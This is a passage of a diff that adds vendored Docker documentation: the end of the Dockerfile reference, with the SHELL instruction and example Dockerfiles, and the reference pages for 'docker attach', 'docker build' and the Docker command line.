+     ---> 6331462d4300
+    Removing intermediate container 6fcdb6855ae2
+    Step 3/5 : RUN New-Item -ItemType Directory C:\Example
+     ---> Running in d0eef8386e97
+    
+    
+        Directory: C:\
+    
+    
+    Mode                LastWriteTime         Length Name
+    ----                -------------         ------ ----
+    d-----       10/28/2016  11:26 AM                Example
+    
+    
+     ---> 3f2fbf1395d9
+    Removing intermediate container d0eef8386e97
+    Step 4/5 : ADD Execute-MyCmdlet.ps1 c:\example\
+     ---> a955b2621c31
+    Removing intermediate container b825593d39fc
+    Step 5/5 : RUN c:\example\Execute-MyCmdlet 'hello world'
+     ---> Running in be6d8e63fe75
+    hello world
+     ---> 8e559e9bf424
+    Removing intermediate container be6d8e63fe75
+    Successfully built 8e559e9bf424
+    PS E:\docker\build\shell>
+
+The `SHELL` instruction could also be used to modify the way in which
+a shell operates. For example, using `SHELL cmd /S /C /V:ON|OFF` on Windows, delayed
+environment variable expansion semantics could be modified.
+
+The `SHELL` instruction can also be used on Linux should an alternate shell be
+required such as `zsh`, `csh`, `tcsh` and others.
+
+The `SHELL` feature was added in Docker 1.12.
+
+## Dockerfile examples
+
+Below you can see some examples of Dockerfile syntax. If you're interested in
+something more realistic, take a look at the list of [Dockerization examples](https://docs.docker.com/engine/examples/).
+
+```
+# Nginx
+#
+# VERSION               0.0.1
+
+FROM      ubuntu
+LABEL Description="This image is used to start the foobar executable" Vendor="ACME Products" Version="1.0"
+RUN apt-get update && apt-get install -y inotify-tools nginx apache2 openssh-server
+```
+
+```
+# Firefox over VNC
+#
+# VERSION               0.3
+
+FROM ubuntu
+
+# Install vnc, xvfb in order to create a 'fake' display and firefox
+RUN apt-get update && apt-get install -y x11vnc xvfb firefox
+RUN mkdir ~/.vnc
+# Setup a password
+RUN x11vnc -storepasswd 1234 ~/.vnc/passwd
+# Autostart firefox (might not be the best way, but it does the trick)
+RUN bash -c 'echo "firefox" >> /.bashrc'
+
+EXPOSE 5900
+CMD    ["x11vnc", "-forever", "-usepw", "-create"]
+```
+
+```
+# Multiple images example
+#
+# VERSION               0.1
+
+FROM ubuntu
+RUN echo foo > bar
+# Will output something like ===> 907ad6c2736f
+
+FROM ubuntu
+RUN echo moo > oink
+# Will output something like ===> 695d7793cbe4
+
+# You᾿ll now have two images, 907ad6c2736f with /bar, and 695d7793cbe4 with
+# /oink.
+```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/attach.md b/vendor/github.com/docker/docker/docs/reference/commandline/attach.md
new file mode 100644
index 0000000000..307068a339
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/attach.md
@@ -0,0 +1,131 @@
+---
+title: "attach"
+description: "The attach command description and usage"
+keywords: "attach, running, container"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# attach
+
+```markdown
+Usage: docker attach [OPTIONS] CONTAINER
+
+Attach to a running container
+
+Options:
+      --detach-keys string   Override the key sequence for detaching a container
+      --help                 Print usage
+      --no-stdin             Do not attach STDIN
+      --sig-proxy            Proxy all received signals to the process (default true)
+```
+
+Use `docker attach` to attach to a running container using the container's ID
+or name, either to view its ongoing output or to control it interactively.
+You can attach to the same contained process multiple times simultaneously,
+screen sharing style, or quickly view the progress of your detached process.
+
+To stop a container, use `CTRL-c`. This key sequence sends `SIGKILL` to the
+container. If `--sig-proxy` is true (the default),`CTRL-c` sends a `SIGINT` to
+the container. You can detach from a container and leave it running using the
+ `CTRL-p CTRL-q` key sequence.
+
+> **Note:**
+> A process running as PID 1 inside a container is treated specially by
+> Linux: it ignores any signal with the default action. So, the process
+> will not terminate on `SIGINT` or `SIGTERM` unless it is coded to do
+> so.
+
+It is forbidden to redirect the standard input of a `docker attach` command
+while attaching to a tty-enabled container (i.e.: launched with `-t`).
+
+While a client is connected to container's stdio using `docker attach`, Docker
+uses a ~1MB memory buffer to maximize the throughput of the application. If
+this buffer is filled, the speed of the API connection will start to have an
+effect on the process output writing speed. This is similar to other
+applications like SSH. Because of this, it is not recommended to run
+performance critical applications that generate a lot of output in the
+foreground over a slow client connection. Instead, users should use the
+`docker logs` command to get access to the logs.
+
+
+## Override the detach sequence
+
+If you want, you can configure an override the Docker key sequence for detach.
+This is useful if the Docker default sequence conflicts with key sequence you
+use for other applications. There are two ways to define your own detach key
+sequence, as a per-container override or as a configuration property on  your
+entire configuration.
+
+To override the sequence for an individual container, use the
+`--detach-keys="<sequence>"` flag with the `docker attach` command. The format of
+the `<sequence>` is either a letter [a-Z], or the `ctrl-` combined with any of
+the following:
+
+* `a-z` (a single lowercase alpha character )
+* `@` (at sign)
+* `[` (left bracket)
+* `\\` (two backward slashes)
+*  `_` (underscore)
+* `^` (caret)
+
+These `a`, `ctrl-a`, `X`, or `ctrl-\\` values are all examples of valid key
+sequences. To configure a different configuration default key sequence for all
+containers, see [**Configuration file** section](cli.md#configuration-files).
+
+#### Examples
+
+    $ docker run -d --name topdemo ubuntu /usr/bin/top -b
+    $ docker attach topdemo
+    top - 02:05:52 up  3:05,  0 users,  load average: 0.01, 0.02, 0.05
+    Tasks:   1 total,   1 running,   0 sleeping,   0 stopped,   0 zombie
+    Cpu(s):  0.1%us,  0.2%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
+    Mem:    373572k total,   355560k used,    18012k free,    27872k buffers
+    Swap:   786428k total,        0k used,   786428k free,   221740k cached
+
+    PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
+     1 root      20   0 17200 1116  912 R    0  0.3   0:00.03 top
+
+     top - 02:05:55 up  3:05,  0 users,  load average: 0.01, 0.02, 0.05
+     Tasks:   1 total,   1 running,   0 sleeping,   0 stopped,   0 zombie
+     Cpu(s):  0.0%us,  0.2%sy,  0.0%ni, 99.8%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
+     Mem:    373572k total,   355244k used,    18328k free,    27872k buffers
+     Swap:   786428k total,        0k used,   786428k free,   221776k cached
+
+       PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
+           1 root      20   0 17208 1144  932 R    0  0.3   0:00.03 top
+
+
+     top - 02:05:58 up  3:06,  0 users,  load average: 0.01, 0.02, 0.05
+     Tasks:   1 total,   1 running,   0 sleeping,   0 stopped,   0 zombie
+     Cpu(s):  0.2%us,  0.3%sy,  0.0%ni, 99.5%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
+     Mem:    373572k total,   355780k used,    17792k free,    27880k buffers
+     Swap:   786428k total,        0k used,   786428k free,   221776k cached
+
+     PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
+          1 root      20   0 17208 1144  932 R    0  0.3   0:00.03 top
+    ^C$
+    $ echo $?
+    0
+    $ docker ps -a | grep topdemo
+    7998ac8581f9        ubuntu:14.04        "/usr/bin/top -b"   38 seconds ago      Exited (0) 21 seconds ago                          topdemo
+
+And in this second example, you can see the exit code returned by the `bash`
+process is returned by the `docker attach` command to its caller too:
+
+    $ docker run --name test -d -it debian
+    275c44472aebd77c926d4527885bb09f2f6db21d878c75f0a1c212c03d3bcfab
+    $ docker attach test
+    root@f38c87f2a42d:/# exit 13
+    exit
+    $ echo $?
+    13
+    $ docker ps -a | grep test
+    275c44472aeb        debian:7            "/bin/bash"         26 seconds ago      Exited (13) 17 seconds ago                         test
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/build.md b/vendor/github.com/docker/docker/docs/reference/commandline/build.md
new file mode 100644
index 0000000000..42c3ecf65f
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/build.md
@@ -0,0 +1,451 @@
+---
+title: "build"
+description: "The build command description and usage"
+keywords: "build, docker, image"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# build
+
+```markdown
+Usage:  docker build [OPTIONS] PATH | URL | -
+
+Build an image from a Dockerfile
+
+Options:
+      --build-arg value         Set build-time variables (default [])
+      --cache-from value        Images to consider as cache sources (default [])
+      --cgroup-parent string    Optional parent cgroup for the container
+      --compress                Compress the build context using gzip
+      --cpu-period int          Limit the CPU CFS (Completely Fair Scheduler) period
+      --cpu-quota int           Limit the CPU CFS (Completely Fair Scheduler) quota
+  -c, --cpu-shares int          CPU shares (relative weight)
+      --cpuset-cpus string      CPUs in which to allow execution (0-3, 0,1)
+      --cpuset-mems string      MEMs in which to allow execution (0-3, 0,1)
+      --disable-content-trust   Skip image verification (default true)
+  -f, --file string             Name of the Dockerfile (Default is 'PATH/Dockerfile')
+      --force-rm                Always remove intermediate containers
+      --help                    Print usage
+      --isolation string        Container isolation technology
+      --label value             Set metadata for an image (default [])
+  -m, --memory string           Memory limit
+      --memory-swap string      Swap limit equal to memory plus swap: '-1' to enable unlimited swap
+      --network string          Set the networking mode for the RUN instructions during build
+                                'bridge': use default Docker bridge
+                                'none': no networking
+                                'container:<name|id>': reuse another container's network stack
+                                'host': use the Docker host network stack
+                                '<network-name>|<network-id>': connect to a user-defined network
+      --no-cache                Do not use cache when building the image
+      --pull                    Always attempt to pull a newer version of the image
+  -q, --quiet                   Suppress the build output and print image ID on success
+      --rm                      Remove intermediate containers after a successful build (default true)
+      --security-opt value      Security Options (default [])
+      --shm-size string         Size of /dev/shm, default value is 64MB.
+                                The format is `<number><unit>`. `number` must be greater than `0`.
+                                Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes),
+                                or `g` (gigabytes). If you omit the unit, the system uses bytes.
+      --squash                  Squash newly built layers into a single new layer (**Experimental Only**)
+  -t, --tag value               Name and optionally a tag in the 'name:tag' format (default [])
+      --ulimit value            Ulimit options (default [])
+```
+
+Builds Docker images from a Dockerfile and a "context". A build's context is
+the files located in the specified `PATH` or `URL`. The build process can refer
+to any of the files in the context. For example, your build can use an
+[*ADD*](../builder.md#add) instruction to reference a file in the
+context.
+
+The `URL` parameter can refer to three kinds of resources: Git repositories,
+pre-packaged tarball contexts and plain text files.
+
+### Git repositories
+
+When the `URL` parameter points to the location of a Git repository, the
+repository acts as the build context. The system recursively clones the
+repository and its submodules using a `git clone --depth 1 --recursive`
+command. This command runs in a temporary directory on your local host. After
+the command succeeds, the directory is sent to the Docker daemon as the
+context. Local clones give you the ability to access private repositories using
+local user credentials, VPN's, and so forth.
+
+Git URLs accept context configuration in their fragment section, separated by a
+colon `:`.  The first part represents the reference that Git will check out,
+this can be either a branch, a tag, or a commit SHA. The second part represents
+a subdirectory inside the repository that will be used as a build context.
+
+For example, run this command to use a directory called `docker` in the branch
+`container`:
+
+```bash
+$ docker build https://github.com/docker/rootfs.git#container:docker
+```
+
+The following table represents all the valid suffixes with their build
+contexts:
+
+Build Syntax Suffix             | Commit Used           | Build Context Used
+--------------------------------|-----------------------|-------------------
+`myrepo.git`                    | `refs/heads/master`   | `/`
+`myrepo.git#mytag`              | `refs/tags/mytag`     | `/`
+`myrepo.git#mybranch`           | `refs/heads/mybranch` | `/`
+`myrepo.git#abcdef`             | `sha1 = abcdef`       | `/`
+`myrepo.git#:myfolder`          | `refs/heads/master`   | `/myfolder`
+`myrepo.git#master:myfolder`    | `refs/heads/master`   | `/myfolder`
+`myrepo.git#mytag:myfolder`     | `refs/tags/mytag`     | `/myfolder`
+`myrepo.git#mybranch:myfolder`  | `refs/heads/mybranch` | `/myfolder`
+`myrepo.git#abcdef:myfolder`    | `sha1 = abcdef`       | `/myfolder`
+
+
+### Tarball contexts
+
+If you pass an URL to a remote tarball, the URL itself is sent to the daemon:
+
+Instead of specifying a context, you can pass a single Dockerfile in the `URL`
+or pipe the file in via `STDIN`. To pipe a Dockerfile from `STDIN`:
+
+```bash
+$ docker build http://server/context.tar.gz
+```
+
+The download operation will be performed on the host the Docker daemon is
+running on, which is not necessarily the same host from which the build command
+is being issued. The Docker daemon will fetch `context.tar.gz` and use it as the
+build context. Tarball contexts must be tar archives conforming to the standard
+`tar` UNIX format and can be compressed with any one of the 'xz', 'bzip2',
+'gzip' or 'identity' (no compression) formats.
+
+### Text files
+
+Instead of specifying a context, you can pass a single `Dockerfile` in the
+`URL` or pipe the file in via `STDIN`. To pipe a `Dockerfile` from `STDIN`:
+
+```bash
+$ docker build - < Dockerfile
+```
+
+With Powershell on Windows, you can run:
+
+```powershell
+Get-Content Dockerfile | docker build -
+```
+
+If you use `STDIN` or specify a `URL` pointing to a plain text file, the system
+places the contents into a file called `Dockerfile`, and any `-f`, `--file`
+option is ignored. In this scenario, there is no context.
+
+By default the `docker build` command will look for a `Dockerfile` at the root
+of the build context. The `-f`, `--file`, option lets you specify the path to
+an alternative file to use instead. This is useful in cases where the same set
+of files are used for multiple builds. The path must be to a file within the
+build context. If a relative path is specified then it is interpreted as
+relative to the root of the context.
+
+In most cases, it's best to put each Dockerfile in an empty directory. Then,
+add to that directory only the files needed for building the Dockerfile. To
+increase the build's performance, you can exclude files and directories by
+adding a `.dockerignore` file to that directory as well. For information on
+creating one, see the [.dockerignore file](../builder.md#dockerignore-file).
+
+If the Docker client loses connection to the daemon, the build is canceled.
+This happens if you interrupt the Docker client with `CTRL-c` or if the Docker
+client is killed for any reason. If the build initiated a pull which is still
+running at the time the build is cancelled, the pull is cancelled as well.
+
+## Return code
+
+On a successful build, a return code of success `0` will be returned.  When the
+build fails, a non-zero failure code will be returned.
+
+There should be informational output of the reason for failure output to
+`STDERR`:
+
+```bash
+$ docker build -t fail .
+
+Sending build context to Docker daemon 2.048 kB
+Sending build context to Docker daemon
+Step 1/3 : FROM busybox
+ ---> 4986bf8c1536
+Step 2/3 : RUN exit 13
+ ---> Running in e26670ec7a0a
+INFO[0000] The command [/bin/sh -c exit 13] returned a non-zero code: 13
+$ echo $?
+1
+```
+
+See also:
+
+[*Dockerfile Reference*](../builder.md).
+
+## Examples
+
+### Build with PATH
+
+```bash
+$ docker build .
+
+Uploading context 10240 bytes
+Step 1/3 : FROM busybox
+Pulling repository busybox
+ ---> e9aa60c60128MB/2.284 MB (100%) endpoint: https://cdn-registry-1.docker.io/v1/
+Step 2/3 : RUN ls -lh /
+ ---> Running in 9c9e81692ae9
+total 24
+drwxr-xr-x    2 root     root        4.0K Mar 12  2013 bin
+drwxr-xr-x    5 root     root        4.0K Oct 19 00:19 dev
+drwxr-xr-x    2 root     root        4.0K Oct 19 00:19 etc
+drwxr-xr-x    2 root     root        4.0K Nov 15 23:34 lib
+lrwxrwxrwx    1 root     root           3 Mar 12  2013 lib64 -> lib
+dr-xr-xr-x  116 root     root           0 Nov 15 23:34 proc
+lrwxrwxrwx    1 root     root           3 Mar 12  2013 sbin -> bin
+dr-xr-xr-x   13 root     root           0 Nov 15 23:34 sys
+drwxr-xr-x    2 root     root        4.0K Mar 12  2013 tmp
+drwxr-xr-x    2 root     root        4.0K Nov 15 23:34 usr
+ ---> b35f4035db3f
+Step 3/3 : CMD echo Hello world
+ ---> Running in 02071fceb21b
+ ---> f52f38b7823e
+Successfully built f52f38b7823e
+Removing intermediate container 9c9e81692ae9
+Removing intermediate container 02071fceb21b
+```
+
+This example specifies that the `PATH` is `.`, and so all the files in the
+local directory get `tar`d and sent to the Docker daemon. The `PATH` specifies
+where to find the files for the "context" of the build on the Docker daemon.
+Remember that the daemon could be running on a remote machine and that no
+parsing of the Dockerfile happens at the client side (where you're running
+`docker build`). That means that *all* the files at `PATH` get sent, not just
+the ones listed to [*ADD*](../builder.md#add) in the Dockerfile.
+
+The transfer of context from the local machine to the Docker daemon is what the
+`docker` client means when you see the "Sending build context" message.
+
+If you wish to keep the intermediate containers after the build is complete,
+you must use `--rm=false`. This does not affect the build cache.
+
+### Build with URL
+
+```bash
+$ docker build github.com/creack/docker-firefox
+```
+
+This will clone the GitHub repository and use the cloned repository as context.
+The Dockerfile at the root of the repository is used as Dockerfile. You can
+specify an arbitrary Git repository by using the `git://` or `git@` scheme.
+
+```bash
+$ docker build -f ctx/Dockerfile http://server/ctx.tar.gz
+
+Downloading context: http://server/ctx.tar.gz [===================>]    240 B/240 B
+Step 1/3 : FROM busybox
+ ---> 8c2e06607696
+Step 2/3 : ADD ctx/container.cfg /
+ ---> e7829950cee3
+Removing intermediate container b35224abf821
+Step 3/3 : CMD /bin/ls
+ ---> Running in fbc63d321d73
+ ---> 3286931702ad
+Removing intermediate container fbc63d321d73
+Successfully built 377c409b35e4
+```
+
+This sends the URL `http://server/ctx.tar.gz` to the Docker daemon, which
+downloads and extracts the referenced tarball. The `-f ctx/Dockerfile`
+parameter specifies a path inside `ctx.tar.gz` to the `Dockerfile` that is used
+to build the image. Any `ADD` commands in that `Dockerfile` that refer to local
+paths must be relative to the root of the contents inside `ctx.tar.gz`. In the
+example above, the tarball contains a directory `ctx/`, so the `ADD
+ctx/container.cfg /` operation works as expected.
+
+### Build with -
+
+```bash
+$ docker build - < Dockerfile
+```
+
+This will read a Dockerfile from `STDIN` without context. Due to the lack of a
+context, no contents of any local directory will be sent to the Docker daemon.
+Since there is no context, a Dockerfile `ADD` only works if it refers to a
+remote URL.
+
+```bash
+$ docker build - < context.tar.gz
+```
+
+This will build an image for a compressed context read from `STDIN`.  Supported
+formats are: bzip2, gzip and xz.
+
+### Usage of .dockerignore
+
+```bash
+$ docker build .
+
+Uploading context 18.829 MB
+Uploading context
+Step 1/2 : FROM busybox
+ ---> 769b9341d937
+Step 2/2 : CMD echo Hello world
+ ---> Using cache
+ ---> 99cc1ad10469
+Successfully built 99cc1ad10469
+$ echo ".git" > .dockerignore
+$ docker build .
+Uploading context  6.76 MB
+Uploading context
+Step 1/2 : FROM busybox
+ ---> 769b9341d937
+Step 2/2 : CMD echo Hello world
+ ---> Using cache
+ ---> 99cc1ad10469
+Successfully built 99cc1ad10469
+```
+
+This example shows the use of the `.dockerignore` file to exclude the `.git`
+directory from the context. Its effect can be seen in the changed size of the
+uploaded context. The builder reference contains detailed information on
+[creating a .dockerignore file](../builder.md#dockerignore-file)
+
+### Tag image (-t)
+
+```bash
+$ docker build -t vieux/apache:2.0 .
+```
+
+This will build like the previous example, but it will then tag the resulting
+image. The repository name will be `vieux/apache` and the tag will be `2.0`.
+[Read more about valid tags](tag.md).
+
+You can apply multiple tags to an image. For example, you can apply the `latest`
+tag to a newly built image and add another tag that references a specific
+version.
+For example, to tag an image both as `whenry/fedora-jboss:latest` and
+`whenry/fedora-jboss:v2.1`, use the following:
+
+```bash
+$ docker build -t whenry/fedora-jboss:latest -t whenry/fedora-jboss:v2.1 .
+```
+### Specify Dockerfile (-f)
+
+```bash
+$ docker build -f Dockerfile.debug .
+```
+
+This will use a file called `Dockerfile.debug` for the build instructions
+instead of `Dockerfile`.
+
+```bash
+$ docker build -f dockerfiles/Dockerfile.debug -t myapp_debug .
+$ docker build -f dockerfiles/Dockerfile.prod  -t myapp_prod .
+```
+
+The above commands will build the current build context (as specified by the
+`.`) twice, once using a debug version of a `Dockerfile` and once using a
+production version.
+
+```bash
+$ cd /home/me/myapp/some/dir/really/deep
+$ docker build -f /home/me/myapp/dockerfiles/debug /home/me/myapp
+$ docker build -f ../../../../dockerfiles/debug /home/me/myapp
+```
+
+These two `docker build` commands do the exact same thing. They both use the
+contents of the `debug` file instead of looking for a `Dockerfile` and will use
+`/home/me/myapp` as the root of the build context. Note that `debug` is in the
+directory structure of the build context, regardless of how you refer to it on
+the command line.
+
+> **Note:**
+> `docker build` will return a `no such file or directory` error if the
+> file or directory does not exist in the uploaded context. This may
+> happen if there is no context, or if you specify a file that is
+> elsewhere on the Host system. The context is limited to the current
+> directory (and its children) for security reasons, and to ensure
+> repeatable builds on remote Docker hosts. This is also the reason why
+> `ADD ../file` will not work.
+
+### Optional parent cgroup (--cgroup-parent)
+
+When `docker build` is run with the `--cgroup-parent` option the containers
+used in the build will be run with the [corresponding `docker run`
+flag](../run.md#specifying-custom-cgroups).
+
+### Set ulimits in container (--ulimit)
+
+Using the `--ulimit` option with `docker build` will cause each build step's
+container to be started using those [`--ulimit`
+flag values](./run.md#set-ulimits-in-container-ulimit).
+
+### Set build-time variables (--build-arg)
+
+You can use `ENV` instructions in a Dockerfile to define variable
+values. These values persist in the built image. However, often
+persistence is not what you want. Users want to specify variables differently
+depending on which host they build an image on.
+
+A good example is `http_proxy` or source versions for pulling intermediate
+files. The `ARG` instruction lets Dockerfile authors define values that users
+can set at build-time using the  `--build-arg` flag:
+
+```bash
+$ docker build --build-arg HTTP_PROXY=http://10.20.30.2:1234 .
+```
+
+This flag allows you to pass the build-time variables that are
+accessed like regular environment variables in the `RUN` instruction of the
+Dockerfile. Also, these values don't persist in the intermediate or final images
+like `ENV` values do.
+
+Using this flag will not alter the output you see when the `ARG` lines from the
+Dockerfile are echoed during the build process.
+
+For detailed information on using `ARG` and `ENV` instructions, see the
+[Dockerfile reference](../builder.md).
+
+### Optional security options (--security-opt)
+
+This flag is only supported on a daemon running on Windows, and only supports
+the `credentialspec` option. The `credentialspec` must be in the format
+`file://spec.txt` or `registry://keyname`.
+
+### Specify isolation technology for container (--isolation)
+
+This option is useful in situations where you are running Docker containers on
+Windows. The `--isolation=<value>` option sets a container's isolation
+technology. On Linux, the only supported is the `default` option which uses
+Linux namespaces. On Microsoft Windows, you can specify these values:
+
+
+| Value     | Description                                                                                                                                                   |
+|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|
+| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value.  |
+| `process` | Namespace isolation only.                                                                                                                                     |
+| `hyperv`  | Hyper-V hypervisor partition-based isolation.                                                                                                                 |
+
+Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`.
+
+
+### Squash an image's layers (--squash) **Experimental Only**
+
+Once the image is built, squash the new layers into a new image with a single
+new layer. Squashing does not destroy any existing image, rather it creates a new
+image with the content of the squshed layers. This effectively makes it look
+like all `Dockerfile` commands were created with a single layer. The build
+cache is preserved with this method.
+
+**Note**: using this option means the new image will not be able to take
+advantage of layer sharing with other images and may use significantly more
+space.
+
+**Note**: using this option you may see significantly more space used due to
+storing two copies of the image, one for the build cache with all the cache
+layers in tact, and one for the squashed version.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/cli.md b/vendor/github.com/docker/docker/docs/reference/commandline/cli.md
new file mode 100644
index 0000000000..e56fb9f847
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/cli.md
@@ -0,0 +1,249 @@
+---
+title: "Use the Docker command line"
+description: "Docker's CLI command description and usage"
+keywords: "Docker, Docker documentation, CLI, command line"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# Use the Docker command line
+
+To list available commands, either run `docker` with no parameters
+or execute `docker help`:
+
+```bash
+$ docker
+Usage: docker [OPTIONS] COMMAND [ARG...]
+       docker [ --help | -v | --version ]
+
+A self-sufficient runtime for containers.
+
+Options:
+      --config string      Location of client config files (default "/root/.docker")
+  -D, --debug              Enable debug mode
+      --help               Print usage
+  -H, --host value         Daemon socket(s) to connect to (default [])
+  -l, --log-level string   Set the logging level ("debug", "info", "warn", "error", "fatal") (default "info")
+      --tls                Use TLS; implied by --tlsverify
+      --tlscacert string   Trust certs signed only by this CA (default "/root/.docker/ca.pem")
+      --tlscert string     Path to TLS certificate file (default "/root/.docker/cert.pem")
+      --tlskey string      Path to TLS key file (default "/root/.docker/key.pem")
+      --tlsverify          Use TLS and verify the remote
+  -v, --version            Print version information and quit
+
+Commands:
+    attach    Attach to a running container
+    # […]
+```
+
+Depending on your Docker system configuration, you may be required to preface
+each `docker` command with `sudo`. To avoid having to use `sudo` with the
+`docker` command, your system administrator can create a Unix group called
+`docker` and add users to it.
+
+For more information about installing Docker or `sudo` configuration, refer to
+the [installation](https://docs.docker.com/engine/installation/) instructions for your operating system.
+
+## Environment variables
+
+For easy reference, the following list of environment variables are supported
+by the `docker` command line:
+
+* `DOCKER_API_VERSION` The API version to use (e.g. `1.19`)
+* `DOCKER_CONFIG` The location of your client configuration files.
+* `DOCKER_CERT_PATH` The location of your authentication keys.
+* `DOCKER_DRIVER` The graph driver to use.
+* `DOCKER_HOST` Daemon socket to connect to.
+* `DOCKER_NOWARN_KERNEL_VERSION` Prevent warnings that your Linux kernel is
+  unsuitable for Docker.
+* `DOCKER_RAMDISK` If set this will disable 'pivot_root'.
+* `DOCKER_TLS_VERIFY` When set Docker uses TLS and verifies the remote.
+* `DOCKER_CONTENT_TRUST` When set Docker uses notary to sign and verify images.
+  Equates to `--disable-content-trust=false` for build, create, pull, push, run.
+* `DOCKER_CONTENT_TRUST_SERVER` The URL of the Notary server to use. This defaults
+  to the same URL as the registry.
+* `DOCKER_HIDE_LEGACY_COMMANDS` When set, Docker hides "legacy" top-level commands (such as `docker rm`, and 
+  `docker pull`) in `docker help` output, and only `Management commands` per object-type (e.g., `docker container`) are
+  printed. This may become the default in a future release, at which point this environment-variable is removed.
+* `DOCKER_TMPDIR` Location for temporary Docker files.
+
+Because Docker is developed using Go, you can also use any environment
+variables used by the Go runtime. In particular, you may find these useful:
+
+* `HTTP_PROXY`
+* `HTTPS_PROXY`
+* `NO_PROXY`
+
+These Go environment variables are case-insensitive. See the
+[Go specification](http://golang.org/pkg/net/http/) for details on these
+variables.
+
+## Configuration files
+
+By default, the Docker command line stores its configuration files in a
+directory called `.docker` within your `$HOME` directory. However, you can
+specify a different location via the `DOCKER_CONFIG` environment variable
+or the `--config` command line option. If both are specified, then the
+`--config` option overrides the `DOCKER_CONFIG` environment variable.
+For example:
+
+    docker --config ~/testconfigs/ ps
+
+Instructs Docker to use the configuration files in your `~/testconfigs/`
+directory when running the `ps` command.
+
+Docker manages most of the files in the configuration directory
+and you should not modify them. However, you *can modify* the
+`config.json` file to control certain aspects of how the `docker`
+command behaves.
+
+Currently, you can modify the `docker` command behavior using environment
+variables or command-line options. You can also use options within
+`config.json` to modify some of the same behavior. When using these
+mechanisms, you must keep in mind the order of precedence among them. Command
+line options override environment variables and environment variables override
+properties you specify in a `config.json` file.
+
+The `config.json` file stores a JSON encoding of several properties:
+
+The property `HttpHeaders` specifies a set of headers to include in all messages
+sent from the Docker client to the daemon. Docker does not try to interpret or
+understand these header; it simply puts them into the messages. Docker does
+not allow these headers to change any headers it sets for itself.
+
+The property `psFormat` specifies the default format for `docker ps` output.
+When the `--format` flag is not provided with the `docker ps` command,
+Docker's client uses this property. If this property is not set, the client
+falls back to the default table format. For a list of supported formatting
+directives, see the
+[**Formatting** section in the `docker ps` documentation](ps.md)
+
+The property `imagesFormat` specifies the default format for `docker images` output.
+When the `--format` flag is not provided with the `docker images` command,
+Docker's client uses this property. If this property is not set, the client
+falls back to the default table format. For a list of supported formatting
+directives, see the [**Formatting** section in the `docker images` documentation](images.md)
+
+The property `serviceInspectFormat` specifies the default format for `docker
+service inspect` output. When the `--format` flag is not provided with the
+`docker service inspect` command, Docker's client uses this property. If this
+property is not set, the client falls back to the default json format. For a
+list of supported formatting directives, see the
+[**Formatting** section in the `docker service inspect` documentation](service_inspect.md)
+
+The property `statsFormat` specifies the default format for `docker
+stats` output. When the `--format` flag is not provided with the
+`docker stats` command, Docker's client uses this property. If this
+property is not set, the client falls back to the default table
+format. For a list of supported formatting directives, see
+[**Formatting** section in the `docker stats` documentation](stats.md)
+
+Once attached to a container, users detach from it and leave it running using
+the using `CTRL-p CTRL-q` key sequence. This detach key sequence is customizable
+using the `detachKeys` property. Specify a `<sequence>` value for the
+property. The format of the `<sequence>` is a comma-separated list of either
+a letter [a-Z], or the `ctrl-` combined with any of the following:
+
+* `a-z` (a single lowercase alpha character )
+* `@` (at sign)
+* `[` (left bracket)
+* `\\` (two backward slashes)
+*  `_` (underscore)
+* `^` (caret)
+
+Your customization applies to all containers started in with your Docker client.
+Users can override your custom or the default key sequence on a per-container
+basis. To do this, the user specifies the `--detach-keys` flag with the `docker
+attach`, `docker exec`, `docker run` or `docker start` command.
+
+Following is a sample `config.json` file:
+
+    {% raw %}
+    {
+      "HttpHeaders": {
+        "MyHeader": "MyValue"
+      },
+      "psFormat": "table {{.ID}}\\t{{.Image}}\\t{{.Command}}\\t{{.Labels}}",
+      "imagesFormat": "table {{.ID}}\\t{{.Repository}}\\t{{.Tag}}\\t{{.CreatedAt}}",
+      "statsFormat": "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}",
+      "serviceInspectFormat": "pretty",
+      "detachKeys": "ctrl-e,e"
+    }
+    {% endraw %}
+
+### Notary
+
+If using your own notary server and a self-signed certificate or an internal
+Certificate Authority, you need to place the certificate at
+`tls/<registry_url>/ca.crt` in your docker config directory.
+
+Alternatively you can trust the certificate globally by adding it to your system's
+list of root Certificate Authorities.
+
+## Help
+
+To list the help on any command just execute the command, followed by the
+`--help` option.
+
+    $ docker run --help
+
+    Usage: docker run [OPTIONS] IMAGE [COMMAND] [ARG...]
+
+    Run a command in a new container
+
+    Options:
+          --add-host value             Add a custom host-to-IP mapping (host:ip) (default [])
+      -a, --attach value               Attach to STDIN, STDOUT or STDERR (default [])
+    ...
+
+## Option types
+
+Single character command line options can be combined, so rather than
+typing `docker run -i -t --name test busybox sh`,
+you can write `docker run -it --name test busybox sh`.
+
+### Boolean
+
